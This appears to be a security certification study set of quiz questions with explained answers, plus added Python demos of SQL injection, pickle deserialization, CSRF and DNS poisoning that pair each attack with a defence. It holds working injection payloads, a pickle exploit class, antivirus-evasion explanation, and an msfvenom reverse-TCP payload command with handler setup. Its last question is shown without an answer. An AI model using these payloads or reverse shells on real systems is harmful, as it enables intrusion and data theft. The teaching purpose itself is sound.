C. Snort Snort is a free open source network intrusion detection system (IDS) and intrusion prevention system (IPS) created in 1998 by Martin Roesch, founder and former CTO of Sourcefire. Snort is now developed by Cisco, which purchased Sourcefire in 2013. Snort's open-source network-based intrusion detection/prevention system (IDS/IPS) has the ability to perform real-time traffic analysis and packet logging on Internet Protocol (IP) networks. Snort performs protocol analysis, content searching and matching. The program can also be used to detect probes or attacks, including, but not limited to, operating system fingerprinting attempts, semantic URL attacks, buffer overflows, server message block probes, and stealth port scans. Snort can be configured in three main modes: 1. sniffer, 2. packet logger, and 3. network intrusion detection.

A pentester is trying to map the organization's internal network. The analyst enters the following command (nmap -n -sS -T4 -p 80 10.0.3.0/24). What type of scan is this? A. Quick Scan B. Intense Scan C. Stealth Scan D. Comprehensive Scan

C. Stealth Scan In nmap, the -sS flag selects a stealth scan, also known as a SYN or half-open scan, the most popular scan option for good reason. It can be performed quickly, scanning thousands of ports per second on a fast network, and is not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy because it never completes the TCP three-way handshake: nmap sends a SYN, reads the SYN/ACK (open) or RST (closed), and tears the half-open connection down with an RST instead of an ACK, so the application on the port never sees a connection and often never logs the probe. The other flags in the command are -n (no reverse DNS lookups), -T4 (aggressive timing) and -p 80 (only port 80), applied to every address in 10.0.3.0/24; "Quick scan", "Intense scan" and "Slow comprehensive scan" are Zenmap profile names, not nmap scan types.

The evil hacker Antonio is trying to attack the IoT device. He will use several fake identities to create a strong illusion of traffic congestion, affecting communication between neighbouring nodes and networks. What kind of attack does Antonio perform? A. Forged Malicious Device B. Side-Channel Attack C. Sybil Attack D. Exploit Kits

C. Sybil Attack The keyword here is fake identities, which is how a Sybil attack works. A Sybil attack in computer security subverts a reputation system by creating multiple identities. A reputation system's vulnerability to a Sybil attack depends on how cheaply identities can be generated, the degree to which the system accepts inputs from entities that have no chain of trust linking them to a trusted entity, and whether it treats all entities identically. As of 2012, evidence showed that large-scale Sybil attacks could be carried out cheaply and efficiently in realistic deployed systems such as the BitTorrent Mainline DHT.

Which of the following SQL injection attacks does an attacker usually use to bypass user authentication and extract data, by adding a conditional OR clause so that the WHERE clause is always true? A. End-of-Line Comment B. UNION SQLi C. Tautology D. Error-Based SQLi

C. Tautology In a tautology-based attack, code is injected using the conditional OR operator so that the query always evaluates to TRUE. Tautology-based SQL injection is typically used to bypass user authentication or extract data by inserting a tautology into the WHERE clause of a SQL query; the original condition becomes a tautology, so every row of the table is exposed to the unauthorized user. A typical SQL tautology has the form "or <comparison expression>", where the comparison expression uses one or more relational operators to compare operands and produce an always-true condition. If an unauthorized user enters the user id abcd and the password anything' or 'x'='x, the resulting query is: select * from user_details where userid = 'abcd' and password = 'anything' or 'x'='x' Because AND binds more tightly than OR, the database evaluates this as (userid = 'abcd' and password = 'anything') or 'x'='x', which is true for every row. Incorrect answers: Error-based SQLi In the error-based technique the attacker inserts malformed input and reads the resulting database error, which reveals the database product and where in the query the syntax broke, for example: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''VALUE''. The error-based technique is the easiest way to find a SQL injection. UNION SQLi When an application is vulnerable to SQL injection and the results of the query are returned within the application's responses, the UNION keyword can be used to retrieve data from other tables within the database. This results in a SQL injection UNION attack. The UNION keyword lets you execute one or more additional SELECT queries and append the results to the original query. For example: SELECT a, b FROM table1 UNION SELECT c, d FROM table2 This SQL query returns a single result set with two columns, containing values from columns a and b in table1 and columns c and d in table2.
For a UNION query to work, two key requirements must be met: · The individual queries must return the same number of columns. · The data types in each column must be compatible between the individual queries. To carry out a SQL injection UNION attack, the injected query must satisfy both requirements. End-of-Line Comment After injecting code into a particular field, the legitimate code that follows is nullified by an end-of-line comment: SELECT * FROM user WHERE name = 'x' AND userid IS NULL; --';
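The four techniques in this answer (tautology, end-of-line comment, UNION, error-based) all come down to the same defect: user input concatenated into the query string. The following Python is an added example, not part of the study set, that builds a constructed in-memory SQLite database with a user_details table like the one in the answer, shows each payload against a concatenating login function, and shows the parameterized version that defeats all of them. Table contents, column names and the secrets table are invented for the demo.

```python
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_details (userid TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO user_details VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    conn.execute("CREATE TABLE secrets (id INTEGER, value TEXT)")
    conn.execute("INSERT INTO secrets VALUES (1, 'constructed-secret')")
    conn.commit()
    return conn


def login_vulnerable(conn, userid: str, password: str) -> list:
    """String concatenation: whatever the user types becomes SQL syntax."""
    query = (
        "SELECT userid, role FROM user_details "
        f"WHERE userid = '{userid}' AND password = '{password}'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn, userid: str, password: str) -> list:
    """Parameterized query: input is bound as data and is never parsed as SQL."""
    return conn.execute(
        "SELECT userid, role FROM user_details WHERE userid = ? AND password = ?",
        (userid, password),
    ).fetchall()


def probe_error(conn, userid: str) -> Optional[str]:
    """Error-based probing: a stray quote breaks the syntax and the database says so."""
    try:
        login_vulnerable(conn, userid, "x")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


# Constructed payloads for the three injection styles described above.
TAUTOLOGY_PASSWORD = "anything' or 'x'='x"              # WHERE ... or 'x'='x'  -> every row
COMMENT_USERID = "alice' --"                            # WHERE userid = 'alice' --' AND ...
UNION_USERID = "x' UNION SELECT value, 'n/a' FROM secrets --"   # two columns, like the original

if __name__ == "__main__":
    db = make_db()
    print("tautology :", login_vulnerable(db, "abcd", TAUTOLOGY_PASSWORD))
    print("comment   :", login_vulnerable(db, COMMENT_USERID, "wrong"))
    print("union     :", login_vulnerable(db, UNION_USERID, "p"))
    print("error     :", probe_error(db, "'"))
    print("safe      :", login_safe(db, "abcd", TAUTOLOGY_PASSWORD), login_safe(db, "alice", "s3cret"))
```

The tautology returns both users, the comment payload logs in as alice without a password, the UNION payload reads a different table, and the bare quote produces a syntax error; the parameterized login returns nothing for every payload and still works for real credentials.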

Which of the following technologies combines the functionality of a firewall, malware scanner, and other security appliances into one device? A. IPS B. Syslog C. UTM D. IDS

C. UTM A Unified Threat Management (UTM) appliance is one that enforces a variety of security-related measures, combining the work of a firewall, malware scanner, and intrusion detection/prevention. A UTM centralizes the threat management service, providing simpler configuration and reporting than isolated applications spread across several servers or devices.

You have run a vulnerability scan and received the following output: CVE-2011-3389 QID 42366 - SSLv3.0/TLSv1.0 Protocol weak CBC mode Server side vulnerability Check with: openssl s_client -connect login.diontraining.com:443 -tls1 -cipher "AES:CAMELLIA:SEED:3DES:DES" Which of the following categories should this be classified as? A. PKI transfer vulnerability B. Active Directory encryption vulnerability C. Web application cryptography vulnerability D. VPN tunnel vulnerability

C. Web application cryptography vulnerability The keywords in the scan output are the weak protocol versions (SSLv3.0/TLSv1.0) and the CBC-mode cipher suites, including 3DES and DES, so this finding is categorized as a web application cryptography vulnerability: the affected service is the HTTPS login page, not a PKI, Active Directory or VPN component. CVE-2011-3389 is the BEAST attack against CBC-mode ciphers in SSL 3.0 and TLS 1.0; the openssl s_client line reproduces the finding by connecting with TLS 1.0 and offering the listed CBC ciphers. The remediation is at the protocol level: disable SSLv3 and TLS 1.0 on the server and negotiate TLS 1.2 or later with AEAD suites such as AES-GCM, rather than merely preferring AES in CBC mode.

Identify the correct syntax for ICMP scan on a remote computer using hping2. A. hping2 target.domain.com B. hping2 --set-ICMP target.domain.com C. hping2 -1 target.domain.com D. hping2 --l target.domain.com

C. hping2 -1 target.domain.com hping2 selects the protocol with a mode flag: -0 (--rawip), -1 (--icmp), -2 (--udp), -8 (--scan) and -9 (--listen); with no mode flag it sends TCP. -1 sends ICMP echo requests by default (the type can be changed with --icmptype), so hping2 -1 target.domain.com is an ICMP ping of the host. hping3 keeps the same syntax. --set-ICMP is not an option, and --l is not a valid long option.

Which of the following Metasploit Framework tool can be used to bypass antivirus? A. msfcli B. msfd C. msfencode D. msfpayload

C. msfencode https://www.offensive-security.com/metasploit-unleashed/msfencode/ One of the classic ways to avoid being stopped by antivirus software was to encode the payload with msfencode. msfencode alters the code in an executable so that it looks different to antivirus signatures but still runs the same way. Much as a binary e-mail attachment is encoded in Base64, msfencode wraps the original executable in a new binary with a decoder stub; when the executable runs, the stub decodes the original code into memory and executes it. Of the other options, msfcli was the command-line interface to the framework, msfd is a daemon that exposes the console over a socket, and msfpayload generated payloads but did not encode them. Caveat: msfpayload and msfencode were removed from Metasploit in 2015 and both jobs are now done by msfvenom (-e selects an encoder such as x86/shikata_ga_nai and -i the number of iterations); modern antivirus detects encoder output easily, so encoding alone is no longer a reliable evasion technique.

What command could be used to list the active services from the Windows command prompt? A. sc query type= running B. sc query \\servername C. sc query D. sc config

C. sc query Windows uses sc query to display information about services. It is part of the Service Control command-line tool, sc.exe, which talks to the Service Control Manager. sc config modifies a service's configuration (its registry entries and the Service Control Manager database) and lists nothing. sc query with no arguments lists only active services of type SERVICE, which is exactly what the question asks for; the filtering options are state= active|inactive|all and type= driver|service|all, so sc query state= all is how you would see stopped services as well. Option A is not valid syntax, because type= accepts driver, service or all, not running. Option B is also not the remote form: the server name goes before the command, as in sc \\servername query, and sc query <name> queries the service with that name.
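Because sc query output is meant for humans, anything that automates this check (an inventory script, a post-exploitation enumeration helper) has to parse the SERVICE_NAME/STATE blocks. The parser below is an added example, not part of the study set; the sample text is a constructed imitation of sc query state= all output for two services, which is the same block layout sc query prints for active services only.

```python
# Constructed sample of `sc query state= all` output (one running, one stopped service).
SAMPLE_SC_QUERY = """\
SERVICE_NAME: Dhcp
DISPLAY_NAME: DHCP Client
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

SERVICE_NAME: Spooler
DISPLAY_NAME: Print Spooler
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1077  (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
"""


def parse_sc_query(text):
    """Turn sc query output into a list of dicts: name, display_name, type, state_code, state."""
    services = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("("):   # blank separator or the (STOPPABLE, ...) flags line
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "SERVICE_NAME":              # every block starts with this line
            current = {"name": value}
            services.append(current)
        elif current is None:
            continue                           # text before the first block, if any
        elif key == "DISPLAY_NAME":
            current["display_name"] = value
        elif key == "STATE":                   # "4  RUNNING": numeric code, then the name
            code, _, name = value.partition(" ")
            current["state_code"] = int(code)
            current["state"] = name.strip()
        elif key == "TYPE":
            current["type"] = value
    return services


def running_services(text):
    """Names of services whose STATE is RUNNING (state code 4)."""
    return [s["name"] for s in parse_sc_query(text) if s.get("state_code") == 4]


if __name__ == "__main__":
    for svc in parse_sc_query(SAMPLE_SC_QUERY):
        print(f"{svc['name']:10s} {svc['state']:8s} {svc['display_name']}")
    print("running:", running_services(SAMPLE_SC_QUERY))
```

On a real host you would feed it the captured text of sc query (or sc query state= all), for example via subprocess.run(["sc", "query"], capture_output=True, text=True).stdout.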

Which of the following can be designated as "Wireshark for CLI"? A. John the Ripper B. nessus C. tcpdump D. ethereal

C. tcpdump Tcpdump is a data-network packet analyzer computer program that runs under a command-line interface. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. Distributed under the BSD license, tcpdump is free software. https://www.wireshark.org/ Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. NOTE: Wireshark is very similar to tcpdump, but has a graphical front-end, plus some integrated sorting and filtering options.

Your company has just announced a change to an "API first" model of software development. As a cybersecurity analyst, you are immediately concerned about the possibility of an insecure deserialization vulnerability in this model. Which of the following is the primary basis for an attack against this vulnerability? A. Lack of input validation could allow for a SQL attack B. Insufficient logging and monitoring makes it impossible to detect when insecure deserialization vulnerabilities are exploited C. Lack of input validation could lead to a cross-site scripting attack D. Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution

D. Accepting serialized objects from untrusted sources or the use of serialized non-primitive data may lead to remote code execution When implementing an API, objects in memory on one computer can be serialized and passed to another for deserialization. If the API user is malicious, they can craft a fictitious object, serialize it correctly, and send it through the API so that deserializing it executes attacker-chosen code. The defences are to accept serialized objects only from trusted sources, to exchange only primitive data types (so nothing with executable behaviour is reconstructed), and to enforce integrity checks such as signatures on any serialized data before deserializing it. Cross-site scripting and SQL injection are not specific to an API-first model. While insufficient logging and monitoring would stop an analyst from detecting that a deserialization vulnerability had been exploited, that is not the basis for the attack itself.
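The mechanism described above, as an added example that is not part of the study set: Python's pickle format lets a serialized object name any callable to run on load, so an API endpoint that unpickles client input executes whatever the client chose. The demo payload calls the built-in eval on a harmless expression (it only reads the process ID) where a real payload would call os.system; the hardened function alongside it accepts a text format carrying only primitive data and validates it against a constructed schema.

```python
import json
import pickle


class Exploit:
    """Any object can tell pickle which callable to invoke on load via __reduce__.

    The victim does not even need this class: the blob references builtins.eval,
    which every Python has. A real payload would name os.system or subprocess.Popen.
    """

    def __reduce__(self):
        return (eval, ("__import__('os').getpid()",))   # harmless stand-in for attacker code


def build_malicious_blob():
    """What a malicious API client sends in place of a legitimate serialized object."""
    return pickle.dumps(Exploit())


def deserialize_vulnerable(blob):
    """Accepts a serialized non-primitive object from an untrusted caller: code runs on load."""
    return pickle.loads(blob)


# Hardened alternative: a text format that carries only primitives, checked against a schema.
ALLOWED_FIELDS = {"user": str, "amount": int}   # constructed schema for the demo


def deserialize_safe(blob):
    try:
        data = json.loads(blob.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError(f"not valid JSON: {exc}") from None
    if not isinstance(data, dict) or set(data) != set(ALLOWED_FIELDS):
        raise ValueError("unexpected shape or fields")
    for key, typ in ALLOWED_FIELDS.items():
        if type(data[key]) is not typ:            # 'type is' also rejects bool posing as int
            raise ValueError(f"bad type for {key!r}")
    return data


def safe_or_none(blob):
    """The validated dict, or None when the blob is rejected."""
    try:
        return deserialize_safe(blob)
    except ValueError:
        return None


if __name__ == "__main__":
    blob = build_malicious_blob()
    print("vulnerable path executed attacker code, result:", deserialize_vulnerable(blob))
    print("safe path on the same blob:", safe_or_none(blob))
    print("safe path on real data:", safe_or_none(b'{"user": "alice", "amount": 5}'))
```

The point of the safe version is not that JSON is magic but that nothing in it can name a callable: the parser produces dicts, lists, strings and numbers, and the schema check turns anything else into a rejection rather than an object with behaviour.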

Which of the following threats to a SaaS deployment would be the responsibility of the consumer to remediate? A. Cross-site scripting B. SQL injections C. Unpatched operating systems on the server D. An endpoint security failure

D. An endpoint security failure In a SaaS model, the consumer has to ensure that the endpoints being used to access the cloud are secure. Since the consumer owns the endpoint (laptop, desktop, tablet, smartphone, etc.), they are responsible for securing it. The entire concept behind using a SaaS product is that the service provider will patch the servers' underlying operating systems, create secure software that isn't vulnerable to SQL injection or cross-site scripting attacks, and ensure proper operations and maintenance of the backend systems.

What encryption does WPA use?

TKIP (Temporal Key Integrity Protocol). WPA kept the RC4 stream cipher inherited from WEP but wrapped it in TKIP (per-packet key mixing, a 48-bit sequence counter and the Michael integrity check) as a stop-gap that existing hardware could run. WPA2 replaced it with CCMP (AES in counter mode with CBC-MAC), and TKIP is now deprecated.

During a port scan on the target host, your colleague sends FIN/ACK probes and finds that an RST packet is sent in response by the target host, indicating that the port is closed. Which of the following port scanning techniques did your colleague use? A. IDLE/IPID header scan B. ACK flag probe scan C. Xmas scan D. TCP Maimon scan

D. TCP Maimon scan The Maimon scan is named after its discoverer, Uriel Maimon. He described the technique in Phrack Magazine issue #49 (November 1996). Nmap, which included this technique, was released two issues later. This technique is exactly the same as the NULL, FIN, and Xmas scans, except that the probe is FIN/ACK. According to RFC 793 (TCP), a RST packet should be generated in response to such a probe whether the port is open or closed. However, Uriel noticed that many BSD-derived systems simply drop the packet if the port is open, so nmap reports an RST as closed and no response as open|filtered.

Session riding

XSRF (cross-site request forgery, CSRF). A page under the attacker's control makes the victim's browser send requests the victim never intended to a site on which the victim is already authenticated; because the browser attaches the session cookie automatically, the target site treats the forged request as a legitimate command from the trusted user.
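An added example, not part of the study set, of the mechanism and of the synchronizer-token check that stops it. The handlers model a money-transfer endpoint as plain functions over a request dict; the session store, server secret and requests are constructed for the demo. The forged request is what a hidden, auto-submitting form on the attacker's page produces: the victim's browser supplies the cookie, but the attacker's page cannot read or compute the token tied to that session.

```python
import hashlib
import hmac

SERVER_SECRET = b"constructed-server-secret"   # assumption: a per-deployment secret kept server-side
SESSIONS = {"sess-7f3a": "alice"}              # constructed session store: cookie value -> user


def csrf_token_for(session_id):
    """Synchronizer token bound to the session; derived with an HMAC so it need not be stored."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _authenticated_user(request):
    return SESSIONS.get(request.get("cookie"))


def transfer_vulnerable(request):
    """Trusts the session cookie alone. The browser attaches that cookie to a cross-site
    form post as well, so a hidden form on the attacker's page rides the victim's session."""
    user = _authenticated_user(request)
    if user is None:
        return 401, "not logged in"
    form = request["form"]
    return 200, f"{user} sent {form['amount']} to {form['to']}"


def transfer_safe(request):
    """Same handler with the synchronizer-token check added (constant-time comparison)."""
    user = _authenticated_user(request)
    if user is None:
        return 401, "not logged in"
    form = request["form"]
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, csrf_token_for(request["cookie"])):
        return 403, "CSRF token missing or invalid"
    return 200, f"{user} sent {form['amount']} to {form['to']}"


# Constructed requests. The forged one carries the victim's cookie but no token.
FORGED_REQUEST = {"cookie": "sess-7f3a", "form": {"to": "mallory", "amount": 90}}
LEGIT_REQUEST = {
    "cookie": "sess-7f3a",
    "form": {"to": "bob", "amount": 10, "csrf_token": csrf_token_for("sess-7f3a")},
}

if __name__ == "__main__":
    print("vulnerable, forged:", transfer_vulnerable(FORGED_REQUEST))
    print("safe, forged      :", transfer_safe(FORGED_REQUEST))
    print("safe, legitimate  :", transfer_safe(LEGIT_REQUEST))
```

In a real application the token is embedded in the form the server renders, and SameSite cookie attributes add a second, browser-enforced layer; the token check is still what makes the server itself refuse a riding request.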

Which of the following is the hacker's first step in conducting a DNS cache poisoning attack on a target organization? a. The hacker queries a nameserver using the DNS resolver. b. The hacker makes a request to the DNS resolver. c. The hacker forges a reply from the DNS resolver. d. The hacker uses TCP to poison the DNS resolver.

b. The hacker makes a request to the DNS resolver. https://ru.wikipedia.org/wiki/DNS_spoofing DNS spoofing (cache poisoning) substitutes a false record for the legitimate one so that a domain's traffic is diverted. Users unaware of the attack are redirected to malicious websites, where sensitive and personal data can be leaked. The resolver is tricked into caching a forged DNS entry, so it keeps returning the fake address for that name until the entry expires, which puts any information sent to that site at risk. Links that lead through poisoned resolvers to look-alike hosts are often delivered in spam emails that prompt users to click; the victim then lands on an attacker-controlled IP address that looks like the real site. Stages of a DNS cache poisoning attack: - The attacker sends a query for the target name to the victim's DNS resolver, which forwards the request towards the root/TLD/authoritative DNS servers and waits for an answer. - The attacker floods the resolver with forged responses that map the name to the attacker's IP address. To be accepted, a forged response must arrive before the genuine one and match the transaction ID and UDP source port of the outstanding query, so attackers send many guesses (and may repeat the query) to raise their chance of success. - A legitimate user who later queries that resolver receives the poisoned record from the cache and is silently redirected to the malicious site.
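The three stages above, as an added simulation that is not part of the study set. The toy resolver accepts a response only if its transaction ID and destination port match an outstanding query for the same name, and the attacker sprays one forged answer per possible 16-bit transaction ID at the port it assumes the resolver used. Names, addresses and the fixed seed are constructed; the comparison between a fixed source port (the pre-2008 default) and a randomized one shows why source-port randomization was the fix.

```python
import random


class Resolver:
    """Toy caching resolver: a reply is accepted only when (txid, port) match a pending query."""

    def __init__(self, randomize_port, seed=1):
        self.rng = random.Random(seed)        # seeded so the demo is reproducible
        self.randomize_port = randomize_port
        self.pending = {}                     # (txid, src_port) -> qname awaiting an answer
        self.cache = {}                       # qname -> answer

    def send_query(self, qname):
        """Stage 1 from the resolver's side: it asks upstream and remembers txid and port."""
        txid = self.rng.randrange(1 << 16)
        port = self.rng.randrange(1024, 1 << 16) if self.randomize_port else 53
        self.pending[(txid, port)] = qname
        return txid, port

    def receive_response(self, txid, dst_port, qname, answer):
        if self.pending.get((txid, dst_port)) != qname:
            return False                      # ID or port mismatch: silently dropped
        del self.pending[(txid, dst_port)]    # first matching answer wins; later ones are ignored
        self.cache[qname] = answer
        return True


def spray_poison(resolver, qname, fake_ip, guessed_port=53):
    """Stage 2: one forged answer for every 16-bit transaction ID at the guessed port.
    Returns the txid that landed, or None if nothing was accepted."""
    for txid in range(1 << 16):
        if resolver.receive_response(txid, guessed_port, qname, fake_ip):
            return txid
    return None


def run_attack(randomize_port):
    """All three stages; returns (poisoned?, what a later client gets from the cache)."""
    resolver = Resolver(randomize_port)
    resolver.send_query("bank.example")                     # stage 1: attacker triggers the lookup
    hit = spray_poison(resolver, "bank.example", "203.0.113.66")
    return hit is not None, resolver.cache.get("bank.example")   # stage 3: victim's lookup


if __name__ == "__main__":
    print("fixed source port 53 :", run_attack(randomize_port=False))
    print("random source port   :", run_attack(randomize_port=True))
```

With a fixed port, 65,536 forged packets are guaranteed to hit; with a random port the attacker has to guess roughly 2^32 combinations and the same spray achieves nothing, which is the practical effect of RFC 5452 style port randomization (DNSSEC removes the guessing game entirely by authenticating the data).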

You were instructed to check the configuration of the webserver and you found that the server permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2 connections. You understand that this vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key information. Which of the following attacks can an attacker perform using this vulnerability? a. DUHK attack b. Padding oracle attack c. DROWN attack d. Side-channel attack

c. DROWN attack https://en.wikipedia.org/wiki/DROWN_attack The DROWN (Decrypting RSA with Obsolete and Weakened eNcryption) attack is a cross-protocol security bug that attacks servers supporting modern SSLv3/TLS protocol suites by using their support for the obsolete, insecure, SSL v2 protocol to leverage an attack on connections using up-to-date protocols that would otherwise be secure. DROWN can affect all types of servers that offer services encrypted with SSLv3/TLS yet still support SSLv2, provided they share the same public key credentials between the two protocols. Additionally, if the same public key certificate is used on a different server that supports SSLv2, the TLS server is also vulnerable due to the SSLv2 server leaking key information that can be used against the TLS server. Full details of DROWN were announced in March 2016, along with a patch that disables SSLv2 in OpenSSL; the vulnerability was assigned the ID CVE-2016-0800. The patch alone will not be sufficient to mitigate the attack if the certificate can be found on another SSLv2 host. The only viable countermeasure is to disable SSLv2 on all servers.

John sent a TCP ACK segment to a known closed port on a firewall, but it didn't respond with an RST. What conclusion can John draw about the firewall he scanned? a. John can't draw any conclusions based on this information. b. It's a non-stateful firewall. c. It's a stateful firewall. d. There is no firewall.

c. It's a stateful firewall. TCP ACK segments are used for gathering information about firewall or ACL configuration. This type of scan aims to discover filter configurations rather than a port state, so it is rarely useful alone, but combined with a SYN scan it gives a more complete picture of the firewall rules in place. When a TCP ACK segment is sent to a closed port, or out of sequence to a listening port, the behaviour RFC 793 expects is for the host to respond with an RST. Getting RSTs back in response to an ACK scan shows that the segment reached the host unfiltered, which is useful for inferring the type of firewall present. A stateful firewall discards an ACK that does not belong to a connection it has seen, so there is no response and nmap marks the port as filtered; a stateless packet filter that allows established traffic by matching the ACK flag would have let the probe through.
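The port-state reasoning in the SYN scan, Maimon scan and ACK scan questions above follows a small table from the nmap reference guide. The following Python is an added example, not part of the study set, that encodes that table as a classifier and also parses the command line from the SYN scan question; the default of "syn" when no -s flag is present assumes a privileged user, as nmap does.

```python
import shlex

# nmap scan flags for the scan types discussed on this page.
SCAN_FLAGS = {"-sS": "syn", "-sT": "connect", "-sA": "ack", "-sF": "fin",
              "-sN": "null", "-sX": "xmas", "-sM": "maimon"}

# A probe gets one of: "syn-ack", "rst", "none" (timeout) or "icmp-unreachable".


def classify(scan, response):
    """Port state nmap reports for one probe/response pair (nmap reference guide rules)."""
    if scan in ("syn", "connect"):
        return {"syn-ack": "open", "rst": "closed"}.get(response, "filtered")
    if scan == "ack":
        # An ACK probe cannot tell open from closed: an RST means the segment reached the host
        # (unfiltered); silence means a stateful firewall discarded the out-of-state ACK.
        return "unfiltered" if response == "rst" else "filtered"
    if scan in ("fin", "null", "xmas", "maimon"):
        if response == "rst":
            return "closed"
        if response == "icmp-unreachable":
            return "filtered"
        # RFC 793 says closed ports RST. BSD-derived stacks drop the probe on open ports,
        # but so does a firewall, so nmap can only report open|filtered.
        return "open|filtered"
    raise ValueError(f"unknown scan type {scan!r}")


def parse_nmap_command(cmd):
    """Extract scan type, ports, timing, DNS behaviour and target from an nmap command line."""
    tokens = shlex.split(cmd)
    if not tokens or tokens[0] != "nmap":
        raise ValueError("not an nmap command")
    info = {"scan": "syn", "ports": None, "timing": "3", "dns": True, "target": None}
    it = iter(tokens[1:])
    for tok in it:
        if tok in SCAN_FLAGS:
            info["scan"] = SCAN_FLAGS[tok]
        elif tok == "-n":
            info["dns"] = False
        elif tok.startswith("-T") and len(tok) == 3:
            info["timing"] = tok[2]
        elif tok == "-p":
            info["ports"] = next(it)
        elif tok.startswith("-p"):
            info["ports"] = tok[2:]
        elif not tok.startswith("-"):
            info["target"] = tok
    return info


if __name__ == "__main__":
    print(parse_nmap_command("nmap -n -sS -T4 -p 80 10.0.3.0/24"))
    print("SYN scan, SYN/ACK back     :", classify("syn", "syn-ack"))
    print("Maimon scan, RST back      :", classify("maimon", "rst"))
    print("Maimon scan, no reply      :", classify("maimon", "none"))
    print("ACK scan, no reply (John)  :", classify("ack", "none"))
```

The colleague's FIN/ACK probe answered by an RST classifies as closed, and John's ACK probe with no RST classifies as filtered, which is the stateful-firewall inference made in the answer.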

Which of the following SQLi types leverages a database server's ability to make DNS requests to pass data to an attacker? a. In-band SQLi b. Time-based blind SQLi c. Out-of-band SQLi d. Union-based SQLi

c. Out-of-band SQLi Out-of-band SQL injection is not very common, mostly because it depends on features being enabled on the database server used by the web application. It occurs when an attacker is unable to use the same channel to launch the attack and gather results. Out-of-band techniques offer an alternative to inferential time-based techniques, especially when server response times are unstable and make a time-based attack unreliable. They rely on the database server's ability to make DNS or HTTP requests to deliver data to an attacker: for example Microsoft SQL Server's xp_dirtree extended stored procedure, which can be made to resolve a UNC path on a DNS server the attacker controls, or Oracle Database's UTL_HTTP package, which can send HTTP requests from SQL and PL/SQL to a server the attacker controls. Incorrect answers: - In-band SQLi In-band SQL injection is the most common and easiest to exploit of the SQL injection attacks. It occurs when an attacker is able to use the same communication channel both to launch the attack and to gather results. - Union-based SQLi Union-based SQLi is an in-band technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result, which is then returned as part of the HTTP response. - Time-based blind SQLi Time-based SQL injection is an inferential technique that sends a query forcing the database to wait a specified number of seconds before responding. The response time tells the attacker whether the injected condition evaluated TRUE or FALSE: the HTTP response is either delayed or returned immediately, so the attacker can infer the result even though no data from the database is returned.
This attack is typically slow (especially on large databases) since an attacker would need to enumerate a database character by character.

Which of the following is a correct example of using msfvenom to generate a reverse TCP shellcode for Windows? a. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.12 LPORT=8888 -f c b. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.12 LPORT=8888 -f c c. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.12 LPORT=8888 -f exe > shell.exe d. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.12 LPORT=8888 -f exe > shell.exe

c. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.12 LPORT=8888 -f exe > shell.exe https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom msfvenom is Metasploit's payload generator; it replaced the separate msfpayload and msfencode tools in 2015. -p selects the payload, -f the output format (exe for a Windows executable, c for the shellcode as a C array), and the output is redirected to a file. For a reverse shell the options that matter are LHOST and LPORT: the payload connects back to them, so they must be your listener's address (LAN IP if attacking inside the network, WAN IP if attacking across the internet) and the port you want the connection on. RHOST is a target option used by exploit modules, not a payload option, which rules out b and d. Note that a is also a syntactically valid msfvenom command; it emits the same payload as C-formatted shellcode rather than a ready-to-run executable, and the answer key treats c as the intended form. To receive the connection, start msfconsole, use exploit/multi/handler, set payload windows/meterpreter/reverse_tcp, set the same LHOST and LPORT, and run the handler before the payload executes on the target.

You are reverse engineering a piece of malware recovered from a retailer's network for analysis. They found that the malicious code was extracting track data from their customer's credit cards during processing. Which of the following types of threats would you classify this malware as? A. Rootkit B. Keylogger C. Ransomware D. POS malware

D. POS malware The keywords here are the retailer's network and credit card processing. Point-of-sale malware (POS malware) is malicious software used by cybercriminals to target point-of-sale and payment terminals with the intent of obtaining credit and debit card information, a card's track 1 or track 2 data and even the CVV code, by intercepting the processing at the retail checkout system (a man-in-the-middle position inside the terminal, often by scraping the card data from memory while it is briefly in cleartext). Ransomware is a type of malware that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. Keyloggers are monitoring software designed to record keystrokes made by a user; they can capture what you type into a website or application and send it back to an attacker. A rootkit is a class of malware that modifies system files, often at the kernel level, to conceal its presence.

Which of the following AAA protocols can use for authentication users connecting via analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay network? A. Kerberos B. TACACS C. DIAMETER D. RADIUS

